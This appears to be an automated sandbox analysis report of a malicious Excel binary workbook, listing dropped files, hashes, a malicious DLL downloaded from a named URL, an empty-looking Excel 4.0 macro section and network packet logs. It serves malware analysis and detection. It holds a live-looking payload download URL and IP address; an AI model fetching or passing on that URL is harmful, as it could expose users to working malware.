                                                                                                                                                                Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):886272
                                                                                                                                                                Entropy (8bit):5.674513513570937
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:Ydk22FB2tfgklpVM5HdBcvLrXmF63WaSc:YdkDT29zaVg3WaSc
                                                                                                                                                                MD5:5BA7AC7FA4F9E831679832B6CC22AEE8
                                                                                                                                                                SHA1:813DF24AC22C2666B28BC3E7FB9BD1EEF2A7F395
                                                                                                                                                                SHA-256:D2C19AC3EACE29239BF919C442556ABF782DA5953325EE6B2626482FBF442F29
                                                                                                                                                                SHA-512:A345B0749D5745640FD7908CDB142960DA22AC6029BAFDDC0666D11EB5033756C3CFDE84D2FB94DCBF418DF40D2CE49EC4A18B919714402B7045B96E619A27CD
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                IE Cache URL:https://quickbooks.aeymotors.com/soft.dll
                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~];V:<U.:<U.:<U....><U....;<U.7n..<<U.7n..+<U.7n..+<U.7n..,<U....1<U.:<T.c=U.7n...<U.7n..;<U.7n..;<U.7n..;<U.Rich:<U.........................PE..L....5.S...........!.....0...................@............................................@......................... >..[.......P................................'..P...8...............................@............................................text...{........0.................. ..`.data...,x...@.......4..............@....idata...............J..............@..@.rsrc................X..............@..@.reloc...'.......(...^..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\75810000
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):739934
                                                                                                                                                                Entropy (8bit):7.613757667716916
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:sRRb8XfJ2p7+wxj7QxYw8dKsWaqw+DfTtRdJyQzmiFx7llWA6zOLn1:sPD7Qy5WtFyinFxhlWAAOL1
                                                                                                                                                                MD5:919C71524C4AD38E68485B8EF18FFCFB
                                                                                                                                                                SHA1:84E886A19E5BAE94174EFCB36781BAE27F908606
                                                                                                                                                                SHA-256:00AA76BB22C8780C743BE7A458C145026EBF8F9BEE5264397575EF8A82BA3589
                                                                                                                                                                SHA-512:69D7BEB6A5271AB05F23AF87235C9655F9D3F0C24B301137C392D616E3278B9B8227E3E64F2578728E65AEF26AFEF52AB91124D6B01A4327DC864E0A64C2120D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .T.n.0....?..........C....I?`M.%.|..$..w);n..V.....;3;...f.l...L.jf.B..6.k.....QQ......."......6"U...}...zt@M..9...A.....j......T.g....C,..q.O6W..^.)Y./.o.}.....5.2...^.!..je...C7.....1;..d.1=`.\..y.3....qEsY?....4.{....J..D.d.N0..i..y?....X.C.w..-...%..2.us.....B...5.T.....9..*<.4..RI...)...GhJASY.......DG.k.rx........B.[...O.T...c.!.~..@....7.....H.......:....>.H<..Nw...Kv...S6x..c.t`.i....2N5.#.r..........PK..........!..j0.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................M
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):89
                                                                                                                                                                Entropy (8bit):4.2887395101637535
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:oVXUbUvLJXUERAW8JOGXnEbUvLJXp7n:o9UwTJXUER9qEwTJXB
                                                                                                                                                                MD5:622796DA58F76A7D579E6ACB8805C986
                                                                                                                                                                SHA1:EF5F7DDAC8FFD14F554A59272ED31AFC9CF7A4B9
                                                                                                                                                                SHA-256:04FA0E5F8C76B043A09C80EA6E59DE6666DBBDDC0A0E22E4441993DE40DF7A18
                                                                                                                                                                SHA-512:A3AD28FF335B44AD90C01832347E001536FFB2F941EAB637C4DA81CBB0922BDFE8A3F5594544532A32B4A600C51964C63B06F7E0631EFE61206D7D45A96DC059
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: [2021/06/11 05:09:05.152] Latest deploy version: ..[2021/06/11 05:09:05.152] 11.211.2 ..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF0BD071FBB4571C26.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.4086481813194674
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lobF9loh9lWUi2Xw:kBqoIq0Ui2Xw
                                                                                                                                                                MD5:5776EA1EA24C4EF818C9B1F7930236FA
                                                                                                                                                                SHA1:6D6199A413F9643D95C6622E8384E92693BF6AE2
                                                                                                                                                                SHA-256:C58D4EF803F942EF52E6E5007470AF7A00F02DCF57113D59BA9CF2B569D1DB1D
                                                                                                                                                                SHA-512:73A9DCBE5E1BBCD7744929EDECDBC9CE612A0172E2E8FB51238D3224629388B39D2823D67E18C1A0B94662A7F3959D513BE3376D57763B4F0BADB635C409B4D1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF0C381C9F25162F0F.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.40966523041045205
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9loYF9log9lWPZtZh:kBqoIrNBrh
                                                                                                                                                                MD5:8264579992805C3C669E9A52F23D0627
                                                                                                                                                                SHA1:D719FF0E06F5CA8461846BF5F9F30D815A163EFE
                                                                                                                                                                SHA-256:AFC54D813AF0ED5332197B49EB76AD0CCEDE6EB98DDAD093932671343776DE28
                                                                                                                                                                SHA-512:94C880FF9959FA655C2A2E617163ECBD4DBB3C89FCFA9B9C703998CE353492C3C9924771A38B15FB707E00073749EF7241A7A0765E4B3CC3BD2F94522E041C68
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF4271FDBD8E9E22F1.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.4125154592058443
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lomF9loK9lW8O3xj:kBqoIFz8+xj
                                                                                                                                                                MD5:4E1A34E11231735937ADCC05BB6858EB
                                                                                                                                                                SHA1:E87786FDE08C67CC84D7AF2434502A34ACC7244E
                                                                                                                                                                SHA-256:D1B6043A270856EE210590096D3E81E9917E031F4CC69983C6A846C26DC011FE
                                                                                                                                                                SHA-512:4FD191751847EB0E43BD9D52A63DB0657E5F6AC7FA337481AB82D570464221F65D91C5CA3FAEC721E156E52267ED57F80CEA5FC2F188064CC5D78869AEE1D92C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF49A83EA77EEC1211.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.40990396631859316
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9loBsF9loBM9lWBx+9nLc:kBqoIBHBhBxEnLc
                                                                                                                                                                MD5:FC793D4F4F3DCC6D4B982980F49EBB0E
                                                                                                                                                                SHA1:F496C78BBFA85FFFDB361A425A5D9BFF098A4ACD
                                                                                                                                                                SHA-256:374E1C33805069F54CBFFBE5CD199555AAE8B1A220BEE4BA0B0A8A9433CDEA68
                                                                                                                                                                SHA-512:0048AC3407C53750A20F1EA840BECB4668602482A4B28CABFAD00B8E76C3F657C0E7EFFC23245DC12566C8BB5F8A9BDC0D33137A1E242B9041A3D0D18992DE2B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF60CBFC830128400E.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40081
                                                                                                                                                                Entropy (8bit):0.6597804907804279
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:kBqoxKAuvScS+RP98fGc4UO/c4UOkc4UOx:kBqoxKAuqR+RP98fGcRO/cROkcROx
                                                                                                                                                                MD5:B41F07FE6AE34A2E20BB3E605299AFFB
                                                                                                                                                                SHA1:6F013EB3C0303609524F4C862F84A80A98C512A0
                                                                                                                                                                SHA-256:962EBFAE0C52F8995B951AEDE9B2B29C33BC646FDE6FFE6BD15E77F0F23BC08A
                                                                                                                                                                SHA-512:023EF050E473B6E022CC786306266F7D1EA5DE0C627626D63050CBD8F36567FA9C6DA3D02F76E30FBF342C4D2071707D4EEDCB7E1C6184412501B0CFC0393830
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF7C4D49990777E39E.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40049
                                                                                                                                                                Entropy (8bit):0.6534455629681263
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:kBqoxKAuvScS+vRT6h/Ug3DTDp7wUg3DTDp7zsg3DTDp79:kBqoxKAuqR+vRT6hMYzp7bYzp7QYzp79
                                                                                                                                                                MD5:A23E8DE3CD5D37D5F466898CE93B03B7
                                                                                                                                                                SHA1:B298765648C97CF0E69C77A6C23FF41B6EDE5EBA
                                                                                                                                                                SHA-256:65EBB07367E1FBB0F6D1E5CB45AB9E3AD7614D010F8C9093FDA3AE56D76659B3
                                                                                                                                                                SHA-512:F8E53D6711A7846730825F7C890DC43EA3D3F1B1970381C2C3A87418A040C178C37E117D2A1DDBDD335D9B6CA39F2320BB7E319CF5C2E612C8E17D0F9F77333F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFC22BD3D12F5E2F3B.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40161
                                                                                                                                                                Entropy (8bit):0.6743315250600196
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:kBqoxKAuqR+npLCJ8ApcHX/ApcHXMApcHXJ:kBqoxKAuqR+npLCJ8nHvnH8nHZ
                                                                                                                                                                MD5:4295C4E20D4FB214EDF426348DB52151
                                                                                                                                                                SHA1:83A40621449F135465C3B8A0FCA9742FF01EEACA
                                                                                                                                                                SHA-256:7BDA9BD1427A2E850C01D9B8E037AC368A80366020826A3F7AC0623E874F7451
                                                                                                                                                                SHA-512:8DEE2CCA1EBB74BC12A8DD59E6D49F92BA52BB25660625A4243DE097FFC9E5D562A0FD1CF5502EDDAE5274BDE05C94692189678F75F58FFCCF932C6AE18659E6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFF45289A08011A808.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40073
                                                                                                                                                                Entropy (8bit):0.6575076740212541
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:kBqoxKAuqR+8aAhK/LMPKV5JLMPKV5iLMPKV53:kBqoxKAuqR+8aAhK/L8KV7L8KVcL8KVJ
                                                                                                                                                                MD5:32969C2D72471F33B0A57C29E0A8A582
                                                                                                                                                                SHA1:EEB9747431108BEF30A6C4B4A4F656A508F84FA3
                                                                                                                                                                SHA-256:F2D93AF08709A19B73A1E55D748DB6109008D26B075F25A4207B5C2A7E080002
                                                                                                                                                                SHA-512:D18BDD675C7568E566562D0905A6305CE0185AAC8F0D5D529900A19D9EE95F4D65AE27D519D56DDFD835C04201E29C8FCCF5A45AAB7A88F897AC37D6D68A3F2F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\Desktop\~$my_attach_82862.xlsb
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):165
                                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                                Entropy (8bit):7.837826149196617
                                                                                                                                                                TrID:
                                                                                                                                                                • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                                • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                                File name:my_attach_82862.xlsb
                                                                                                                                                                File size:300462
                                                                                                                                                                MD5:1f155a8f8c53066ef9dba8520cbcf346
                                                                                                                                                                SHA1:75dda503a5f1bbb11c8de9236ff237a7989e8e80
                                                                                                                                                                SHA256:29b13fa315a5249d1654221cf944f097ac4b0c42a133d07365cd3cc6afdd1a10
                                                                                                                                                                SHA512:f3e563c1b12cbd044c641a5cc7b0675ac0a589e01e898aea3105bef9e53f7bd2fe43b176e432955d21c8239a4c564588ed499d168c1f7bcd62337d09c1dffccd
                                                                                                                                                                SSDEEP:6144:HzL4syD+ZIa3R0RocOIHJKWQOBNRdvfAxupyHmEsHAzEKdkTtx5ooTadR/pLVo0M:D+VcGJRj5ooTadRdeFyinFxhlWAAOLf
                                                                                                                                                                File Content Preview:PK..........!.........r.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                                Static OLE Info

                                                                                                                                                                General

                                                                                                                                                                Document Type:OpenXML
                                                                                                                                                                Number of OLE Files:1

                                                                                                                                                                OLE File "my_attach_82862.xlsb"

                                                                                                                                                                Indicators

                                                                                                                                                                Has Summary Info:
                                                                                                                                                                Application Name:
                                                                                                                                                                Encrypted Document:
                                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                                Flash Objects Count:
                                                                                                                                                                Contains VBA Macros:

                                                                                                                                                                Macro 4.0 Code

                                                                                                                                                                ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,FALSE,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                                Network Behavior

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Jun 11, 2021 05:06:40.462929964 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:40.649384022 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.649503946 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:40.650397062 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:40.837954998 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.844822884 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.844886065 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.844916105 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.845056057 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:40.845108032 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:40.867790937 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.056504965 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.056627035 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.058192015 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.253619909 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.253680944 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.253720045 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.253758907 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.253797054 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.253834009 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.253844023 CEST49714443192.168.2.350.87.220.158
